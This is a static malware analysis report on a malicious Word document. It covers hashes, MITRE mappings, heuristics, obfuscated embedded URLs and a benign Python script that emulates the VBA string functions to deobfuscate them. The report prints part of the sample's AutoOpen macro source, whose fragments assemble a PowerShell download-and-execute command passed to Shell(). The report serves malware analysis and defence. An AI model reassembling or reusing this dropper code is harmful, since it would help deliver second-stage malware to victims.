Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e1e52fb9e12f7a79…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 244.0 KB
Created: 2017-12-12 07:04:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 4e60670e90433f8daefbb91b0d6eed6b
SHA-1: 8a402a05f64a56223a38c4f99bced54b213e316b
SHA-256: e1e52fb9e12f7a79bb2ca1837841b713046b2a983f6978f68eab1bfd53220227
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word document whose VBA project contains an AutoOpen routine, so the macro runs as soon as the document is opened with macros enabled. The macro assembles its command at runtime from string fragments: concatenated random-looking literals passed through UCase() and Trim(), and Mid() extractions from longer literals that carry the recognisable pieces. The result is handed to Shell(). The fragments visible in the extracted source include a URL beginning "http://localwo", the token ".exe", and pieces of "Invoke-Item", "foreach", "break" and "catch" that are interrupted by the recurring junk sequences "wrL+wrL" and "i0s+i0s"; together they read as a PowerShell command line. The string reported as the constructed URL, 'http://localwowrL+wi0s+i0srLi0s+i0sowrL+wrLd.cmCwm7sspZdG2o', is that obfuscated form, and the final URL is not established by the static output shown here. AutoOpen, runtime string assembly and a Shell() call together are the pattern of a downloader/dropper that fetches and executes a second-stage payload.
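To see what that string assembly actually yields, the following Python script (an added example; it is not part of the report and not the sample's own macro code) evaluates assignment lines copied from the macros.bas preview in the Extracted artifacts section. It implements the VBA semantics of UCase(), Trim() and Mid() (plus LCase() and StrReverse(), which the excerpt does not use), ranks the most frequent 7-character substrings across the results so that filler tokens stand out, and strips a filler list to check whether execution tokens become contiguous. Two things are assumptions rather than report facts: the filler list FILLERS ("wrL+wrL", "i0s+i0s") is a hypothesis read off the n-gram ranking, and "'+'" is treated as PowerShell concatenation of single-quoted pieces. The UCase/Trim line is shortened to two literals per call; the Mid() literals are copied verbatim.

```python
"""Static emulation of the VBA string idioms seen in macros.bas (added example,
not code from the report or from the sample).  It evaluates assignments such as
    name = UCase("a" + "b") + Trim("c" + "d")    and    name = Mid("lit", start, len)
the way VBA does, ranks frequent 7-char substrings so filler tokens stand out,
and strips an analyst-chosen filler list to see whether execution tokens join up.
The subset used by the macro (double-quoted literals, +, function calls, ints)
is also valid Python syntax, so ast.parse() does the lexing; the walker below
evaluates only the node types it lists and never calls eval()."""
import ast
import re
from collections import Counter

# Constructed input: assignment lines copied from the macros.bas preview; the
# UCase/Trim line is shortened to two literals per call.
SAMPLE_VBA = r'''
TaHhjuLaqw = UCase("hBnszrdVwoa" + "ijXKIdif") + Trim("ESkCplIJwXoN" + "tzTnVPbO")
qjXjPzh = Mid("Mirrh6FomwrL+wrL.ua/Hl'+'sWafG9zXhTjG5", 8, 20)
OKbpXkubH = Mid("LMISwQKTJhdSKMEQhd2shttp://localwowrL+wi0s+i0srLi0s+i0sowrL'+'+wrLd.cmCwm7sspZdG2o", 20, 50)
wQkCjQZXAAH = Mid("m9uMXBhwrL+wrLuawrL+wrLs);wrL+wrLInwrL+w'+'rLvoke-Iti0s+i0sem(bi6huwrL+wrLawrL+wrLs)w'+'r'+'L+wrL;wrL+wrLbwrL+wrLreak;wrL+wrL}wrL+wi0s+i0srLcati0s+i0scwrL+wri0s+i0sLi0s+i0sh{wriwrL+wrLte-mCKFKckr8BSHVz", 7, 181)
XhHpw = Mid("7pwXjZWinw5nL5s + bi6kwrL+w3rwbjadW5LE8qnjna6h", 13, 15)
qDnlCp = Mid("P0a4hhRprLarapawrL+wrLs i0s+i0s'+'+ v5s.exev5s'+';'+'forwrL+wrLeach'+'(bi6a'+'bc inwi0s+i0srL+wrL i0s+i0swrL+wr'+'LbizlDu0rOPMvcqLXnVEju", 9, 109)
'''
# Assumptions, not report facts: the fillers are read off top_ngrams(), and
# "'+'" is treated as PowerShell concatenation of single-quoted pieces.
FILLERS = ["'+'", "wrL+wrL", "i0s+i0s"]
EXEC_TOKENS = ("http://", "https://", ".exe", "invoke-item", "invoke-expression",
               "powershell", "foreach(", "wscript.shell", "start-process")
ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")

def vba_mid(s, start, length=None):
    """VBA Mid(): 1-based start; an omitted length runs to the end."""
    return s[start - 1:] if length is None else s[start - 1:start - 1 + length]

# VBA names are case-insensitive, so everything is keyed in lower case.
BUILTINS = {"ucase": str.upper, "lcase": str.lower, "mid": vba_mid,
            "strreverse": lambda s: s[::-1],
            "trim": lambda s: s.strip(" ")}       # VBA Trim strips spaces only

def eval_node(node, env):
    """Evaluate one expression node; env holds earlier assignments."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (str, int)):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        return eval_node(node.left, env) + eval_node(node.right, env)
    if isinstance(node, ast.Name):
        return env[node.id.lower()]
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and not node.keywords:
        return BUILTINS[node.func.id.lower()](*[eval_node(a, env) for a in node.args])
    raise ValueError(f"unsupported construct: {type(node).__name__}")

def evaluate_assignments(vba_text):
    """{variable: value} for every assignment the evaluator can resolve."""
    results, env = {}, {}
    for m in filter(None, map(ASSIGN_RE.match, vba_text.splitlines())):
        name, rhs = m.groups()
        try:
            value = eval_node(ast.parse(rhs, mode="eval").body, env)
        except (SyntaxError, ValueError, KeyError, TypeError):
            continue                                  # not string-building code
        if isinstance(value, str):
            results[name] = env[name.lower()] = value
    return results

def top_ngrams(values, n=7, k=2):
    """Most frequent n-char substrings across values: filler candidates."""
    counts = Counter()
    for v in values:
        counts.update(v[i:i + n] for i in range(len(v) - n + 1))
    return [gram for gram, _ in counts.most_common(k)]

def strip_fillers(value, fillers=FILLERS):
    """Delete fillers until nothing changes; removing "'+'" is what makes
    "wrL+w'+'rL" a removable "wrL+wrL", so a single pass is not enough."""
    previous = None
    while previous != value:
        previous = value
        for filler in fillers:
            value = value.replace(filler, "")
    return value

def executable_tokens(value):
    """Execution/download tokens present in value, matched case-insensitively."""
    return [t for t in EXEC_TOKENS if t in value.lower()]

def analyze(vba_text=SAMPLE_VBA, fillers=FILLERS):
    """{name: (raw value, filler-stripped value, tokens found after stripping)}."""
    report = {}
    for name, raw in evaluate_assignments(vba_text).items():
        clean = strip_fillers(raw, fillers)
        report[name] = (raw, clean, executable_tokens(clean))
    return report

if __name__ == "__main__":
    print("filler candidates:", top_ngrams(evaluate_assignments(SAMPLE_VBA).values()))
    for name, (raw, clean, toks) in analyze().items():
        print(f"{name:12} {', '.join(toks) or '-':<20} {clean!r}")
```

Run as a script it prints the two filler candidates and, per variable, the tokens found after stripping. The UCase/Trim assignment evaluates to a string that carries no recognisable token, whereas the Mid() fragments do; an analyst would feed the complete macro into SAMPLE_VBA and follow the value that reaches the Shell() argument rather than trust any single fragment, and would treat the stripped text as a hypothesis until it is confirmed by sandboxing or by the macro's own replace logic.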

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro calls Shell(), i.e. it can launch an external process.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines AutoOpen, which runs automatically when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (macros.bas under Extracted artifacts), so the marker adds nothing beyond OLE_VBA_AUTOOPEN.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://localwowrL+wi0s+i0srLi0s+i0sowrL (in document text, OLE body)
    • http://bluwrL+wrLeboxsourcing.cowrL+wrLm (in document text, OLE body)
    • http://diei0s+i0swrL+wrLs (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    The first three carry the same junk sequences ("wrL+wrL", "i0s+i0s") as the macro's string fragments and are obfuscated pieces rather than resolvable hosts; the fourth is the standard DrawingML XML namespace and is benign on its own.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 90265 bytes
SHA-256: 5a3336efedb9f42c2f0069578886a62035a6b2772d4f681c24ece0cf1ef29a6b

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "YwWpanjzKzQ"
Function asHwsSc()
TaHhjuLaqw = UCase("hBnszrdVwoa" + "ijXKIdif" + "knWBNjKG" + "HWrzdhYAUfIU" + "jcDtwoqKsI" + "TwNQrmHSPL") + Trim("ESkCplIJwXoN" + "tzTnVPbO" + "SijTHIhYq" + "KwXlItz" + "CjKBfjG" + "uSUwzkSrAG")
qjXjPzh = Mid("Mirrh6FomwrL+wrL.ua/Hl'+'sWafG9zXhTjG5", 8, 20)
womfGl = UCase("kfNpGuzXSunNzw" + "UObYEBWvpIRQYa" + "boQGasMlpG" + "PiaGoztCGiE" + "dvNkXhpdb" + "wTwztYBIcmRYmn") + Trim("jUSWVTpWZm" + "MIoEAcER" + "GHrGVBzCRzFI" + "PoMWHFdJwZ" + "iLsUXmpU" + "DObdMATWnF")
TzbmU = UCase("VizbajjCIV" + "KtWKZfCQ" + "zNkOPDtFafjkCX" + "aCHkVwjzBiH" + "ZoLnokHZIul" + "XndccpbI") + Trim("tkWXSvCQQi" + "HbUQPsrzvzV" + "QvNhSDUMGzE" + "EoQWpFIrLFE" + "TNNkzbNYYEGbFN" + "MwWZIXnMabVK")
rGaSNY = UCase("NGjKCwjRflS" + "pLMAsoBWBSXQP" + "iomOwuC" + "CAQzCWFQQBVH" + "PINIjTKdvjQvA" + "vfQpYoFJL") + Trim("umiQkBWuIOTj" + "FMbrGHRACC" + "KlzMzThG" + "dNzotstMWnluOG" + "cwwzBtjs" + "VGzCKzpjMjus")
OKbpXkubH = Mid("LMISwQKTJhdSKMEQhd2shttp://localwowrL+wi0s+i0srLi0s+i0sowrL'+'+wrLd.cmCwm7sspZdG2o", 20, 50)
owTCFFrYKzU = UCase("pdVKrROEqjOim" + "IAhoQcVvvojw" + "fBmIcRXiui" + "knwiWMIuVqfLsm" + "iTthjiu" + "jDEalNOzNRmEdd") + Trim("ZjflahzptWYiD" + "MCRptObRlXhHs" + "uGiaEcUwB" + "UMjNKEMfKJAPU" + "kPQHzIETp" + "vmozdbUOBYUh")
UVVSlETc = UCase("mwNNFiPQP" + "iojAWhECuUMTns" + "CYwEiiMSMJzlo" + "FcTGJVNawSzHh" + "XCTKUVD" + "RLhRSWW") + Trim("ZvQOorsNdXibc" + "FazMuKqnRSl" + "LHYsCrD" + "tDqTLfJ" + "jwrbclG" + "UGbMAli")
dkTVKC = UCase("IwSLGPDVCUNUJ" + "JJlDbwapb" + "cUUOJzTOI" + "uTEFQGjBbWZPU" + "NHuLiuPSVCimvo" + "CAzLWUqE") + Trim("mVPZOFpMzaBC" + "IjNXcwB" + "iLupYVZEwZ" + "CNYJfqEQNV" + "UmJzsQzzsrDJ" + "KUjpjQIB")
wQkCjQZXAAH = Mid("m9uMXBhwrL+wrLuawrL+wrLs);wrL+wrLInwrL+w'+'rLvoke-Iti0s+i0sem(bi6huwrL+wrLawrL+wrLs)w'+'r'+'L+wrL;wrL+wrLbwrL+wrLreak;wrL+wrL}wrL+wi0s+i0srLcati0s+i0scwrL+wri0s+i0sLi0s+i0sh{wriwrL+wrLte-mCKFKckr8BSHVz", 7, 181)
kuclzd = UCase("cojkolVmXXmCji" + "OAkGUaJ" + "aBSYwPqEHY" + "qWzYRvbFDFwEW" + "FMMQfKXSQFjVN" + "XjSfirndPb") + Trim("LsVGRbzvi" + "DiocNUXFtpvhC" + "WnSafCbzkzTR" + "Mzdmafi" + "CdDQWQXVmX" + "qnjiJXQfOFt")
Msjfj = UCase("izrkZij" + "inBsqIfbcJ" + "zhfwDQzK" + "OjzNkSIJ" + "IqPSTJP" + "PTMDOGGB") + Trim("UzAoUaY" + "KCqnHXAWWU" + "rjNVjvAjz" + "AZqLiwJ" + "RoQqsJHY" + "IvMhrmoKVH")
QInTdAbK = UCase("OUXRAXTiqjts" + "KcckOVvkH" + "mTVvNZXQP" + "IYIwDJXk" + "XlojosoIa" + "trCGBkw") + Trim("bFFSPikIlUf" + "EwLTkhwjjCYQ" + "LVQGSHLEiviKEV" + "wjGUctAv" + "iVTmOwYhoVD" + "TCTMUcaC")
XhHpw = Mid("7pwXjZWinw5nL5s + bi6kwrL+w3rwbjadW5LE8qnjna6h", 13, 15)
ukTwXW = UCase("RtTuaWJcAcY" + "qNFfCAnDOK" + "rklVImBBNrf" + "XUVQWAiXskVVU" + "GlJhDOHScJpA" + "pwbLiLW") + Trim("LjkRDjmiHOPB" + "fQrfnRjEsM" + "WwoYQZnKzEv" + "YQAfVkV" + "azfJijfuuncTUK" + "EuNRibEDRkLTPn")
CRoGKkzW = UCase("JfMnlAwEoDL" + "kXznZqfXzVj" + "BiinHIQat" + "YpHwdwc" + "ASsijiWZumu" + "inwumGWIwfm") + Trim("jkwHjbMhuVVR" + "TvARiNdfNR" + "tMMWcTjUfGBw" + "OsTZMkNRfUS" + "WrNRJFTS" + "OTPqFaoAm")
DofjADj = UCase("AoAjoTji" + "KFVMBdAdiW" + "TlmWUVRFFmhzjn" + "kSTOYPvf" + "DusEwkOW" + "AmOCdLSC") + Trim("dicImYrtiKT" + "jYGdSZcMHVYLqi" + "vioHvWl" + "wjvIUNFCD" + "JROHYKm" + "qWIKRSDXwKtDX")
qDnlCp = Mid("P0a4hhRprLarapawrL+wrLs i0s+i0s'+'+ v5s.exev5s'+';'+'forwrL+wrLeach'+'(bi6a'+'bc inwi0s+i0srL+wrL i0s+i0swrL+wr'+'LbizlDu0rOPMvcqLXnVEju", 9, 109)
SAzSqiNMs = UCase("SwUCpuDTc" + "UOrtLFc" + "CWBifRAYD" + "GKYQtCzOBoXW" + "mqNtzbV" + "zwVwQRkQCBR") + Trim("UMSfDUptwEnvf" + "OrRYAzhEH" + "DSckPzwm" + "fkaXipfm" + "iuKZSzCsziB" + "JQFGcksEiz")
fiLPmq = UCase("wHKzXQIzCTU" + "jRmnJdUF" + "OJlPdFwQuIA" + "hTHzbnWhrUp" + "IlmkJAQiRvjzY" + "uKLiHKUcwzfp") + Trim("qwYouUwGrTMH" + "sROmkJZtsLVIMi" + "jmoETSZktH" + "dcbDrzbOSCOMN" + "QownCjhqaa" + "iHnbSjU")
LRtIanGTzD = UCase("XzpiIiQk" + "wjjzCP
... (truncated)